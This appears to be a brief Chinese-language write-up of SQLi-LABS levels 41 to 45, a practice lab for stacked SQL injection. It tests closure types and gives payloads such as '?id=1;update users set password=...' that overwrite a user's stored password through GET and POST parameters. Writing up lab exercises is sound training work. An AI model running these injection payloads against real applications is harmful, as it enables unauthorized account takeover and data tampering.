SQLi-LABS 41关
data:image/s3,"s3://crabby-images/37173/37173b54d1a4023f48d43ede1fda5cb349d29de0" alt=""
这一关是堆叠注入
测试闭合
?id=1' //回显错误
?id=1'--+ //回显错误
?id=1--+ //回显正确
所以是数字型的注入
测试堆叠注入,更改Dumb的密码
?id=1;update users set password='123456' where username='Dumb'--+
data:image/s3,"s3://crabby-images/82dec/82dec8f5efe56ec3d32421dfc856e19105b12693" alt=""
SQLi-LABS 42关
data:image/s3,"s3://crabby-images/10f48/10f48e65e325f73d80272e350906c385164d5857" alt=""
这一关使用的是post传参,所以需要进行抓包,依旧是堆叠注入
data:image/s3,"s3://crabby-images/41585/41585d5afef185713fd5248e2f822d8b2deaee15" alt=""
在密码处进行堆叠注入,更新Dumb的密码为123
data:image/s3,"s3://crabby-images/4475d/4475ddeb4e4982afc470782dc5f6449b229ed3e2" alt=""
返回登录测试是否更改成功
data:image/s3,"s3://crabby-images/b50ae/b50aeebc689e39cd94c7a8b0495b0ef32eb36c6b" alt=""
SQLi-LABS 43关
data:image/s3,"s3://crabby-images/96cdb/96cdba3ab18799f08df1193dc6aecdcac010ceaf" alt=""
这一关和上一关一样,都是密码处是堆叠注入,只不过闭合方式是单引号加括号
1'); update users set password='666' where username='Dumb' --+
data:image/s3,"s3://crabby-images/2a38c/2a38c7d9555177eb601a970766752c2e992e34ed" alt=""
SQLi-LABS 44关
data:image/s3,"s3://crabby-images/9944f/9944f0e1c708bc6a35b93632d9bef4c12f2f6462" alt=""
这一关和四十二关一样
SQLi-LABS 45关
data:image/s3,"s3://crabby-images/2a94d/2a94da93b49c874b0a941ff355e8aca9e08ab114" alt=""
这一关和四十三关一样,都不在赘述